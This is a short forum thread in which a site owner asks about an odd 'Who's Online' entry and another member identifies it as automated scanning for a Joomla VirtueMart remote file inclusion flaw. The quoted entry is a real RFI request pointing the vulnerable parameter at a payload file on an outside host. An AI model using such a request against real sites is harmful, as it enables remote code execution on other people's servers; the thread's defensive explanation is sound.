Log in

View Full Version : Possibly malicious location reported in who's online


wheres me jumpa
12-31-2009, 02:37 PM
Firstly Happy New Year to all.

Secondly, I have noticed an unusual location being reported in the Who's Online screen, details are:

Unknown Location
/members//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.myluxurychalet.com/cache/id.txt??

The URL changes occasionally and the IP addresses resolve to different host names also. Can anyone explain what this is?

Thanks,

Jumpa

Angel-Wings
01-01-2010, 08:15 PM
Well - except you run vulnerable software at your Server / Site there's no need to put a lot of care about this.
Rotating IP's and Locations - typical script kiddies scanning IP ranges with a list of vulnerable software for locations to hack.
Like said - except you run vulnerable software there's no need to care about it. Also writing down the IP's trying to contact the hosters or blocking them - waste of time. Better secure your machine instead of taking care about others at first.

If an IP is getting too annoying - excessive scanning for 1 or 2 days - you can take your logs and inform the hoster but usually the hosters don't care much about such reports :mad:

If you want to clean out your logs a little bit - mod_security can help to give such scanners a 4xx / 5xx reply depending on the configuration

wheres me jumpa
01-03-2010, 01:36 PM
Thanks for your reply Angel-Wings. Just so I know, what exactly is the above location / file actually doing?

Angel-Wings
01-03-2010, 02:48 PM
That's a remote file inclusion for Joomla. So except you've Joomla installed there's no need to care about this.

Like said already, things you don't have installed can't be hacked

wheres me jumpa
01-04-2010, 06:14 PM
Great thanks for the explanation Angel-Wings.